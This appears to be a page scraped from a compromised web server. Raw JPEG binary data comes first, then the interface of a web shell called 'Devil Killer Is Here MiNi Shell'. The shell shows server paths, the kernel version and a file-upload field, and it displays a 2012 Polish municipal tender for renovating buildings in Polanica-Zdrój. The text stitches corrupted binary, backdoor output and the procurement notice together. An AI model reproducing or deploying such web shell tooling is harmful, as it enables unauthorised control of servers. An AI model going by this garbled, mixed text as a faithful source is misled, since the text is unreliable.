JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120406/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120406/110758-N-2012.html

<p class="kh_header"><b>Polanica-Zdrój: Rewitalizacja Obszaru Miejskiego w Polanicy-Zdróju</b><br>
<b>Numer ogłoszenia: 110758 - 2012; data zamieszczenia: 06.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Polanica-Zdrój , ul. Dąbrowskiego 3, 57-320 Polanica-Zdrój, woj. dolnośląskie, tel. 074 8680600, faks 0-74 86 810 46.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.polanica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Obszaru Miejskiego w Polanicy-Zdróju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie polega na wykonaniu remontów zespołu budynków położonych przy ul. Dąbrowskiego w Polanicy Zdroju, t.j. budynek mieszkalny 1A, budynek mieszkalny 1C , budynek mieszkalny  1E, budynek mieszkalny 1G. Szczegółowy zakres prac określa przedmiar robót, stanowiący załączniki do SIWZ.
Zakres rzeczowy dla budynku Dąbrowskiego 1 A
aRoboty przy wznoszeniu budynków
1/Rusztowania ramowe przyścienne o wysokości do 10 m   320,00 m2,
2/Rusztowania ramowe przyścienne do wysokości 16 m   432,00 m2
3/Wykonanie rusztowań przy kominach o obwodzie od 2 do 5 m   5,0 szt.,
b)Przygotowanie terenu pod budowę 
1)czyszczenie ręczne pionowych powierzchni  słup kamienny  4,50 m2,.
2)Rozbiórka opaski betonowej  18,88 m3,
3)Skucie cokołu cementowego  35,72 m2,
4)odbicie tynków zewnętrznych z zaprawy cementowo wapiennej na ścianach, filarach, pilastrach  494,015 m2,
5)osłony okien folią  89,47 m2,
6)wykopy wąskoprzestrzenne, nie umocnione o szer. dna do 1,5 m 8,208 m3,
7)zasypanie wykopu żwirem - opaska żwirowa  8,208 m3,
8)rozebranie płotków śnieżnych  32,0 m,
9)rozebranie rynien  57,10 m,
10)rozebranie rur spustowych  21,00 m,
11)demontaż wsporników odstępowych instalacji odgromowej  120,0 szt.,
12)demontaż przewodów uziemiających i odgromowych z pręta  120,0 m,
13)demontaż przewodów uziemiających i odgromników mocowanych na wspornikach na ścianie  48, 0 m,
14)ręczne wykucie bruzd dla przewodów wtynkowych w cegle  35, 0 m,
15)ręczne wykucie bruzd dla rur w cegle  16,0 m,
16)oczyszczenie ze starej farby elementów drewnianych  104,01 m
17)demontaż przewodów kabelkowych z podłoża drewnianego - ze zdjęciem uchwytów, wykuciem kołków  45,0 m,
18)demontaż rur winidurowych do 47 mm instalacji nadtynkowej- 16,0 m,
19)rozebranie obróbek blacharskich z murów ogniowych, okapów,   88,40 m2,
20)ozbiórka pokrycia z dachówki - 475,55 m2,
21)demontaż wyłazu dachowego - 7 szt.,
22)wykucie bruzd pionowych 1x1 c w ścianie z cegieł - 3,0 m,
23)demontaż rurociągu z PCV na ścianach budynku - 5,0 m,
24)rozebranie elementów więźb dachowych - ołacenie dachu - 461,30 m2,
25)rozebranie elementów więźb dachowych - deskowanie dachu z desek na styk - kosze, podbitka - 32,00 m2,
26)usunięcie nieczystości ze strychu - 2,0 m3,
27)wykucie z muru podokienników - 4,0 m,
28)wywiezienie gruzu samochodami na odległość 5 km  46,67 m3,
29)wywóz ziemi samochodami na odległość 5 km  8,208 m3,
c)Tynkowanie 
1)Izolacje cieplne i przeciwdźwiękowe z płyt styropianowych  0,90 m2,
2)Renowacja elementów ozdobnych na elewacji bocznej  1,0 kpl,
3)Zewnętrzne profile ciągnione zwykła o szer. do 50 cm  11,80 m,
4)Zewnętrzne profile ciągnione zwykła o szer. do 20 cm  11,80 m,
5)Przygotowanie podłoża pod wykonanie tynków renowacyjnych  na prawa podłoża i wypełnienie spoin  222,848 m2,
6)Odgrzybianie podłoży budowlanych przy renowacji starego budownictwa preparatem RENOGAL ręczne malowanie jednokrotne  222,848 m2,
7)Tynki renowacyjne THERMOPAL wykonywanie ręcznie  222,848 m2,
8)Tynki zewnętrzne zwykłe na ścianach  286,16 m2,
9)Tynki zewnętrzne zwykła na ościeżach  19,92 m2,
10)Prace wykończeniowe przy tynkach renowacyjnych szpachlowanie powierzchni tynków gr. warstwy 1,0 mm 536,01 m2,
4. Roboty malarskie 
1)Prace wykończeniowe przy tynkach renowacyjnych  gruntowanie  575,63 m2,
2)Prace wykończeniowe przy tynkach renowacyjnych  malowanie dwukrotne  575,63 m2,
3)Lakierowanie dwukrotne elementów drewnianych  145,13 m2,
4)Impregnacja ogniochronna desek, płyt, bali  517,60 m2,
5)Dwukrotna impregnacja grzybobójcza bali krawędziaków preparatami solnymi  357,60 m2,
6)Dwukrotna impregnacja grzybobójcza desek i płyt metodą smarowania preparatami solnymi -160,0 m2,
7)Hydrofobizacji podłoży przy renowacji starego budownictwa malowanie ręczne  słup kamienny  4,5 m2
5.Roboty murarskie
1)Naprawa uszkodzonych podokienników  10,0 msc,
2)Przemurowanie kominów z cegieł  4,80 m3,
3)Zamurowanie bruzd pionowych o szer. 1 cegły z przewodami instalacyjnymi cegła klinkierowa  3,0 m,
6.Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty
1)Deskowanie połaci dachowych  kosze  32,0 n2,
2)Mocowanie folii dachowej na krokwiach  475,55 m2,
3)Montaż kontrłat na dachu bez deskowania  475,55 m2,
4)Ołacenie połaci dachowych łatami  475,55 m2,
5)Pokrycie dachu dachówką karpiówką ceramiczną w koronkę  475,55 m2,
6)Obróbki blacharskie z blachy powlekanej  108,92 m2,
7)Obróbki wywiewek kanalizacyjnych w dachach krytych papą lub dachówką - z blachy ocynkowanej  1,0 szt.,
8)Wyłazy dachowe fabrycznie wykończone 7,0 szt.,
9)Rynny dachowe półokrągłe o śr. 15 cm - montaż z gotowych elementów z blachy tytanowo cynkowej  57,10 m,
10)Rury spustowe okrągłe o śr. 12 cm - montaż z gotowych elementów  21,0  m,
11)Montaż zabezpieczeń przeciwśnieżnych z płotkiem -32,0 m,
12)Podłoga z desek struganych gr. 32 mm  80,00 m2,
13)Montaż zabezpieczeń przed ptakami - szerokość chroniona od 30  150 mm

7.Roboty instalacyjne elektryczne 
1)Montaż zwodów poziomych instalacji odgromowych na budynkach  160, 0 m,
2)montaż przewodów odprowadzających instalacji odgromowej na budynkach  48, 0 m
3)łączenie pręta na dachu z pomocą złączy skręcanych uniwersalnych krzyżowych  24, 0 szt.,
4)montaż złączy do rynny okapowej na dachu w instalacji odgromowej lub przewodów wyrównawczych  6, 0 szt.,
5)montaż złączy kontrolnych z połączeniem drut płaskownik w instalacji odgromowej  6, 0 szt., 
6)montaż zwodów pionowych instalacji odgromowej z prętu ocynkowanego na dachu lub dymniku stromym   7, 0 szt.,
7)badania i pomiary instalacji piorunochronnej (pierwszy pomiar)  6, 0 szt., 
8)przewód wtynkowy  łączony przekrój żył do 7, 5 mm2 (podłoże inne niż beton układany w tynku  z demontażu  45,0 m,
9)rury winidurowe o śr. 28 mm układane p/t w podłożu różnym od betonowego w gotowych bruzdach  z demontażu  16,0 m,
10)zaprawienie bruzd o szer. do 25 mm2  61, 00 m,
11)rurociągi z PCV o śr. 160 mm na ścianach budynku o połączeniach wciskowych - 5,00

Załącznik nr 1A Dąbrowskiego 1 A 
a)Kosztorys ofertowy ( do wypełnienia) wraz z przedmiarem robót.

Zakres rzeczowy dla budynku Dąbrowskiego 1 C

d)Roboty przy wznoszeniu budynków
4)Rusztowania ramowe przyścienne o wysokości do 10 m -356, 0 m2,
5)Rusztowania ramowe przyścienne do wysokości 16 m  48, 0 m2
6)Wykonanie rusztowań przy kominach o obwodzie od 2 do 5 m  2szt.,
e)przygotowanie terenu pod budowę 
1)odbicie tynków zewnętrznych z zaprawy cementowo wapiennej na ścianach, filarach, pilastrach  439, 42 m2,
2)osłony okien folią  43, 82 m2,
3)wykopy wąskoprzestrzenne, nie umocnione o szer. dna do 1,5 m 6,012 m3,
4)zasypanie wykopu żwirem  opaska żwirowa - 6, 012 m3,
5)rozebranie rynien  30, 60 m,
6)rozebranie rur spustowych  27,00 m,
7)demontaż wsporników odstępowych instalacji odgromowej  80, 0 szt.,
8)demontaż przewodów uziemiających i odgromowych z pręta 95, 0 m,
9)demontaż przewodów uziemiających i odgromników mocowanych na wspornikach na ścianie  32, 0 m,
10)ręczne wykucie bruzd dla przewodów wtynkowych w cegle  52, 0 m,
11)wykucie z muru wsporników  4, 0 szt.,
12)demontaż przewodów kabelkowych z podłoża drewnianego - ze zdjęciem uchwytów - 52, 0 m,
13)rozebranie obróbek blacharskich z murów ogniowych, okapów,  20,32 m2,
14)rozbiórka pokrycia z dachówki  252, 86 m2,
15)rozebranie elementów więźb dachowych - ołacenie dachu  252, 86 m2,
16)rozebranie elementów więźb dachowych - deski okapowe, gzymsowe, wiatrowe  35, 20 m,
17)rozebranie elementów więźb dachowych - deskowanie dachu z desek na styk - kosze, podbitka  65, 90 m2,
18)wywiezienie gruzu samochodami na odległość 5 km  27, 107 m3,
19)wywóz ziemi samochodami na odległość 5 km  6, 012 m3,
f)Tynkowanie 
11)Zewnętrzne profile ciągnione zwykła o szer. do 20 cm  49, 10 m,
12)Przygotowanie podłoża pod wykonanie tynków renowacyjnych  na prawa podłoża i wypełnienie spoin  161, 43 m2,
13)Odgrzybianie podłoży budowlanych przy renowacji starego budownictwa preparatem RENOGAL - ręczne malowanie jednokrotne  161, 43 m2,
14)Tynki renowacyjne THERMOPAL wykonywanie ręcznie  161, 43 m2,
15)Tynki zewnętrzne zwykłe na ścianach 259, 96 m2,
16)Tynki zewnętrzne zwykła na ościeżach  12, 11 m2,
17)Prace wykończeniowe przy tynkach renowacyjnych 443, 32 m2
4. Roboty malarskie 
8)Prace wykończeniowe przy tynkach renowacyjnych  gruntowanie 449, 202 m2,
9)Prace wykończeniowe przy tynkach renowacyjnych  malowanie dwukrotne  449, 201 m2,
10)Lakierowanie dwukrotne elementów drewnianych  51, 09 m2,
11)Impregnacja ogniochronna desek, płyt, bali  169, 98 m2,
12)Dwukrotna impregnacja grzybobójcza bali krawędziaków preparatami solnymi - 169, 98 m2,
13)Dwukrotnie malowanie powierzchni metalowych  4, 50 m2,
5.Roboty murarskie
4)Naprawa uszkodzonych podokienników  24, 0 msc,
5)Przemurowanie kominów z cegieł  1, 28 m3,
6)Naprawa uszkodzonych w murze powierzchni 4, 0 szt.,
7)Wypełnienie pęknięć murów zaprawą polimerową  25, 0 m,
6.Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty
1)Wymiana elementów konstrukcyjnych dachu - płatwie  6, 0 m,
2)Wymiana elementów konstrukcyjnych dachu - murłaty  końcówki  8, 0 m,
3)Wykonanie deskowania - montaż desek czołowych  wiatrownice  20, 60 m,
4)Deskowanie połaci dachowych z tarcicy nasyconej  65, 99 m2,
5)Mocowanie folii dachowej na krokwiach 252, 86 m2,
6)Montaż kontrłat na dachu bez deskowania  252, 86 m2,
7)Ołacenie połaci dachowych łatami  252, 86 m2,
8)Pokrycie dachu dachówką karpiówką ceramiczną w koronkę 252, 86 m2,
9)Wyłazy dachowe fabrycznie wykończone 2, 0 szt.,
10)Obróbki blacharskie z blachy powlekanej -38, 08 m2,
11)Rynny dachowe półokrągłe o śr. 15 cm  montaż z gotowych elementów z blachy tytanowo cynkowej 34, 20 m,
12)Rury spustowe okrągłe o śr. 12 cm  montaż z gotowych elementów  39, 50 m,
13)Montaż zabezpieczeń przed ptakami szerokość chroniona od 30  150 mm

7.Roboty instalacyjne elektryczne 
1)Montaż zwodów poziomych instalacji odgromowych na budynkach  120, 0 m,
2)montaż przewodów odprowadzających instalacji odgromowej na budynkach  32, 0 m
3)łączenie pręta na dachu z pomocą złączy skręcanych uniwersalnych krzyżowych  14, 0 szt.,
4)montaż złączy do rynny okapowej na dachu w instalacji odgromowej lub przewodów wyrównawczych  4, 0 szt.,
5)montaż złączy kontrolnych z połączeniem drut-płaskownik w instalacji odgromowej  4, 0 szt., 
6)montaż zwodów pionowych instalacji odgromowej z prętu ocynkowanego na dachu lub dymniku stromym 32, 0 szt.,
7)badania i pomiary instalacji piorunochronnej (pierwszy pomiar) - 4, 0 szt., 
8)zaprawienie bruzd o szer. do 25 mm2  52, 00 m,
9)przewód wtynkowy  łączony przekrój żył do 7, 5 mm2 (podłoże inne niż beton układany w tynku  z demontażu  52,0 m,

Załącznik nr 1 C- Dąbrowskiego 1 C 
a)Kosztorys ofertowy ( do wypełnienia) wraz z przedmiarem robót.

Zakres rzeczowy dla budynku Dąbrowskiego 1 E

1.Roboty przy wznoszeniu rusztowań
1)rusztowania ramowe przyścienne o wys. do 10 m  624,00 m2,
2)wykonanie rusztowań przy kominach  3 szt.,
2.Przygotowanie terenu pod budowę
1)czyszczenie ręczne pionowych powierzchni  cokół kamienny  20,74 m2,
2)odbicie tynków zewnętrznych 507,17 m2,
3)osłony okien i drzwi folią 55,22 m2,
4)wykopy wąskoprzestrzenne 2,56 m3,
5)zasypanie wykopów żwirem  opaska żwirowa  2,56 m3,
6)rozebranie rynien  49,60 m,
7)rozebranie rur spustowych  34,0 m,
8)ręczne wykucie bruzd dla przewodów wtynkowych  65,0 m,
9)ręczne wykucie bruzd dla rur  8,0 m,
10)wykucie z musu wsporników stalowych 4,0 szt.,
11)demontaż rurociągu z OPCV na ścianach budynku  7,0 m,
12)demontaż przewodów kabelkowych  65,0 m,
13)rozebranie obróbek blacharskich murów ogniowych, okapów,  33,68 m2,
14)rozbiórka pokrycia z dachówki  208,0 m2,
15)rozebranie elementów więźb dachowych  ołacenie dachu  208,0 m2,
16)rozebranie pokrycia z papy na dachach drewnianych - krotność  4 154,0 m2
17)rozebranie elementów więźb dachowych  deskowanie dachu  154,0 m2,
18)rozebranie elementów więźb dachowych  deski okapowe, wiatrowe - 96,2 m,
19)rozebranie elementów więźb dachowych  deskowanie dachu kosze, podbitka  68,20 m2,
20)wywiezienie gruzu na odległość 5 km  37,64 m3,
21)wywóz ziemi na odległość 5 km  2,57 m3,
3.Tynkowanie
1)izolacja cieplna i przeciwdźwiękowa z płyt styropianowych  1, 50 m2,
2)zewnętrzne profile ciągnione do 60 cm w rozwinięciu  100, 80 m,
3)przygotowanie podłoża pod wykonanie tynków renowacyjnych- naprawa podłoża  178, 16 m2,
4)odgrzybianie podłoża preparatem RENOGAL - ręczne malowanie  178, 16 m2,
5)tynki renowacyjne THERMOPAL wyk. Ręcznie dwuwarstwowo  178, 16 m2,
6)tynki zewnętrzne zwykłe na ścianach  353, 70 m2,
7)tynki zewnętrzne zwykłe na ościeżach do 30 cm 6,78 m2, 
8)tynki zewnętrzne zwykłe na ościeżach do 15 cm  0, 74 m2,
9)prace wykończeniowe przy tynkach renowacyjnych  gruntowanie pow. tynków  622, 84 m2,
10)prace wykończeniowe przy tynkach renowacyjnych  malowanie dwukrotne  622, 84 m2,
11)lakierowanie dwukrotne elementów drewnianych  83, 08 m2,
12)impregnacja ogniochronna desek, płyt, bali  221, 952 m2,
13)dwukrotna impregnacja grzybobójcza drewna  221, 952 m2,
14)hydrofobizacji podłoża przy renowacji  - cokół kamienny  20,74 m2,
4.Roboty murarskie 
1)naprawa uszkodzeń podokienników  24 msc,
2)przemurowanie kominów z cegieł 2, 30 m3,
3)zamurowanie bruzd pionowych o szerokości 1 c  7, 5m,
5.Roboty w zakresie pokryć dachowych i konstrukcji dachowych i inne podobne roboty
1)wymiana elementów konstrukcyjnych dachu - płatwie  6, 00 m,
2)wymiana elementów konstrukcyjnych dachu - murłaty  końcówki  8, 0 m,
3)wymiana elementów konstrukcyjnych dachu - koniec krokwi  20, 00 szt.,
4)wykonanie deskowania - montaż deski okapowej 49, 60 m,
5)mocowanie folii dachowej na krokwiach  256, 40 m2,
6)montaż kontrłat na dachu bez deskowania, rozstaw krokwi do 100 cm  256, 40 m2,
7)ołacenie połaci dachowych łatami 256, 40 m2,
8)pokrycie dachów dachówką karpiówką ceramiczną  256, 40 m2,
9)deskowanie połaci dachowych z tarcicy  105, 60 m2,
10)pokrycie dach ów papą termozgrzewalną dwuwarstwowo  105, 60 m2,
11)obróbki blacharskie z blachy powlekanej  56, 96 m2,
12)obróbki wywiewek kanalizacyjnych w dachu - blachą ocynk.  2,0 szt.,
13)wyłazy dachowe fabrycznie wykończone - 3 szt.,
14)podsufitki drewniane z desek gr. 19 mm podbitka dachowa  68, 20 m2,
15)rynny dachowe o śr. 15 cm - montaż z gotowych elementów z blachy tytanowo-cynkowej  49, 60 m,
16)rury spustowe okrągłe o śr. 12 cm - montaż z gotowych elementów z blachy tytanowo cynkowej - 34, 0 m,
17)Montaż zabezpieczeń przed ptakami - szerokość chroniona od 30  150 mm

18)Roboty instalacyjne elektryczne
1)montaż zwodów poziomych instalacji odgromowych nie naprężonych 180, 0 m,
2)montaż przewodów odprowadzających instalacji odgromowej na budynkach  42, 0 m,
3)łączenie pręta na dachu z pomocą złączy skręcanych uniwersalnych krzyżowych  15, 0 szt.,
4)montaż złączy do rynny okapowej na dachu w instalacji odgromowej lub przewodów wyrównawczych  4, 0 szt.,
5)montaż złączy kontrolnych z połączeniem drut-płaskownik w instalacji odgromowej  4, 0 szt., 
6)montaż zwodów pionowych instalacji odgromowej z prętu ocynkowanego na dachu lub dymniku stromym  3, 0 szt.,
7)montaż uziomu powierzchniowego w wykopie do 0.8 m w gruncie kat. IV - 80, 00 m,
8)łączenie przewodów uziemiających przez spawanie w wykopie  bednarka 120 mm2  4, 0 szt.,
9)montaż przewodów odprowadzających instalacji odgromowej na budynkach na cegle z wykonaniem otworu ręcznie  bednarka do 120 mm2  8, 00 m,
10)montaż osłon o długości do 2 m przewodów uziemiających na cegle  4, 0 szt.,
11)badania i pomiary instalacji piorunochronnej (pierwszy pomiar) 4, 0 szt., 
12)zaprawienie bruzd o szer. Do 25 mm2  73, 00 m,
13)przewód wtynkowy  łączony przekrój żył do 7,5 mm2 (podłoże inne niż beton układany w tynku  z demontażu  65,0 m,
19)Roboty instalacyjne kanalizacyjne
1)Rurociągi z PCV kanalizacyjne o śr. 110 mm na ścianach w budynkach mieszkalnych o połączeniach wciskowych 7, 5 m

Załącznik nr 1 E -Dąbrowskiego 1 E 
a)Kosztorys ofertowy ( do wypełnienia) wraz z przedmiarem robót.


Zakres rzeczowy dla budynku Dąbrowskiego 1 G

I.ELEWACJA BOCZNA - POŁUDNIOWO ZACHODNIA
1.Roboty przy wznoszeniu rusztowań
a)rusztowania ramowe przyścienne o wysokości do 16m  144, 00 m2,
b)osłony z siatki na rusztowaniach zewnętrznych  144, 00 m2,
2.Przygotowanie terenu pod budowę
a)osłony okien folią  18, 40 m2,
b)odbicie tynków zewnętrznych  123, 52 m2,
c)ręczne wykucie bruzd dla przewodów wtynkowych  3, 00 m,
d)wykucie z muru podokienników  11, 20 m,
e)wywiezienie gruzu na odległość 5 km  3, 706 m3,
3.Roboty w zakresie instalacji elektrycznych
a) przewód wtynkowy układany na tynku  24, 50 m,
4.Roboty murarskie
a)obsadzanie podokienników kamiennych do 1, 5 m w ścianach z cegły  13 szt.
b)obsadzanie nakrywy słupka  1 szt.,
5.Tynkowanie
a)odgrzybianie podłoży budowlanych preparatem RENOGAL  35, 96 m2
b)tynki renowacyjne THERMOPOL wykonywanie ręcznie - dwuwarstwowo  33, 80 m2,
c)tynki zewnętrzne zwykłe  72, 905 m2,
d)tynki zewnętrzne zwykłe na ościeżach 8, 00 m2,
e)zewnętrzne profile ciągnione zwykłe  22, 10 m,
f)zewnętrzne bonie prostokątne na ścianach płaskich 24, 50 m,
g)spoinowanie pękniętych murów zaprawą ASO-TFM  1 kpl,
6.Roboty malarskie
a)prace wykończeniowe przy tynkach renowacyjnych - gruntowanie 131, 205 m2,
b)prace wykończeniowe przy tynkach renowacyjnych - malowanie dwukrotne 131, 205 m2,
II.  ELEWACJA FRONTOWA 
1.Roboty przy wznoszeniu rusztowań
a)rusztowania ramowe przyścienne o wysokości do 16m  300, 00 m2,
b)słony z siatki na rusztowaniach zewnętrznych  300, 00 m2,
2.Przygotowanie terenu pod budowę
a)osłony okien folią  47, 433 m2,
b)odbicie tynków zewnętrznych  278, 89 m2,
c)oczyszczenie powierzchni cokołu - kamień porowaty  piaskowiec 1381, 00 dm2
d)ręczne wykucie bruzd dla przewodów wtynkowych  22, 00 m,
e)wykucie z muru podokienników  11, 70 m,
f)wywiezienie gruzu na odległość 5 km  8, 367 m3,
3.Roboty w zakresie instalacji elektrycznych
a) przewód wtynkowy układany na tynku  33, 050 m
4.Roboty murarskie
a)obsadzanie podokienników kamiennych do 1, 5 m w ścianach z cegły  14 szt.
5.Tynkowanie
a)odgrzybianie podłoży budowlanych preparatem RENOGAL  86, 397 m2
b)tynki renowacyjne THERMOPOL wykonywanie ręcznie - dwuwarstwowo  78, 48 m2,
c)tynki zewnętrzne zwykłe  183, 80 m2,
d)tynki zewnętrzne zwykłe na ościeżach  13, 06 m2,
e)zewnętrzne profile ciągnione zwykłe  34, 50 m,
f)zewnętrzne bonie prostokątne na ścianach płaskich  34, 95 m,
g)uzupełnienie ubytków  flekowanie. Flek o pow. od 30 do 100 cm2. Piaskowiec 100, 00 szt. ,
h)spoinowanie elementów z piaskowca zaprawą ASO-TFM-R, cokół ościeżnice 14, 61 m2,
7.Roboty malarskie
a)prace wykończeniowe przy tynkach renowacyjnych  gruntowanie 293, 66 m2,
b)prace wykończeniowe przy tynkach renowacyjnych  malowanie dwukrotne 293, 66 m2,
c)hydrofobizacji podłoży przy renowacji starego budownictwa preparatem ASOLIN WS  powierzchni z piaskowca  14, 61 m2,
III.   ELEWACJA BOCZNA - PÓLNOCNO WSCHODNIA 
1.Roboty przy wznoszeniu rusztowań
a)rusztowania ramowe przyścienne o wysokości do 16m  132, 00 m2,
b)osłony z siatki na rusztowaniach zewnętrznych  132, 00 m2,
2.Przygotowanie terenu pod budowę
a)osłony okien folią  10, 62 m2,
b)odbicie tynków zewnętrznych 117, 56 m2,
c)wykucie z muru podokienników 1, 40 m,
d)ręczne wykucie bruzd dla rur  13, 80 m,
e)ręczne wykucie bruzd dla przewodów wtynkowych  5, 00 m,
f)wykucie bruzd pionowych w  ścianie z cegły  8,00 m,
g)demontaż rurociągów z PCV na ścianach budynku  8, 00 m,
h)wykucie z muru ościeżnic stalowych lub krat okiennych  7, 00 m2,
i)demontaż i montaż zadaszenia w celu postawienia rusztowania 1 kpl,
3.Roboty w zakresie instalacji elektrycznych
a)rury winidurowe układane p.t w gotowych bruzdach  13, 80 m
b)przewód wtynkowy układany na tynku  5, 00 m
4.Roboty murarskie
a)obsadzanie podokienników kamiennych do 1, 5 m w ścianach z cegły  2 szt.,
b)zamurowanie bruzd  8, 0 m
5.Tynkowanie
a)odgrzybianie podłoży budowlanych preparatem RENOGAL  52, 22 m2
b)tynki renowacyjne THERMOPOL wykonywanie ręcznie - dwuwarstwowo 52, 22 m2,
c)tynki zewnętrzne zwykłe  102, 02 m2,
d)tynki zewnętrzne zwykłe na ościeżach 3, 66 m2,
e)zewnętrzne profile ciągnione zwykłe  10, 80 m,
f)zamurowanie bruzd o szer. do 30 mm  11, 80 m,
8.Roboty malarskie
a)prace wykończeniowe przy tynkach renowacyjnych  gruntowanie 161, 80 m2,
b)prace wykończeniowe przy tynkach renowacyjnych  malowanie dwukrotne 161, 80 m2,
